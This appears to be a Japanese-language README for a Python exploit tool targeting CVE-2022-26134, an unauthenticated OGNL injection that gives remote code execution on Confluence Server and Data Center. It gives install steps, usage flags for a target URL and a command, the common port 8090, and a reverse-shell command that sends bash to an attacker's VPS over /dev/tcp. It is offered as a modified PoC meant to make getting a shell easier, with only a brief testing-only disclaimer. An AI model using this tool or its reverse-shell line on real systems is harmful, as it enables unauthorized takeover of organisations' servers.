
リモート攻撃者は、Confluenceにおいて認証なしでOGNL式を構築して注入し、Confluence ServerまたはData Center上で任意のコードを実行できます。既存のスクリプト上でPOCを修正し、getshellを容易にします。
リモート攻撃者は認証なしでOGNL式を注入し、Confluence ServerまたはData Center上で任意のコードを実行できます。POCを修正し、getshellを容易にします。一般的なポート:8090
pip3 install requests
______ _______ ____ ___ ____ ____ ____ __ _ _____ _ _
/ ___\ \ / | ____| |___ \ / _ |___ \|___ \ |___ \ / /_ / |___ /| || |
| | \ \ / /| _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__ _|
\____| \_/ |_____| |_____|\___|_____|_____| |_____|\___/|_|____/ |_|
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND
CVE-2022-26134
optional arguments:
-h, --help このヘルプメッセージを表示して終了
-t TARGET, --target TARGET
対象URL
-c COMMAND, --command COMMAND
コマンドを実行(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1
python3 CVE-2022-26134.py -t [server ip] -c [command] //コマンドを実行
このスクリプトはテスト目的でのみ使用可能であり、他の用途には使用しないでください。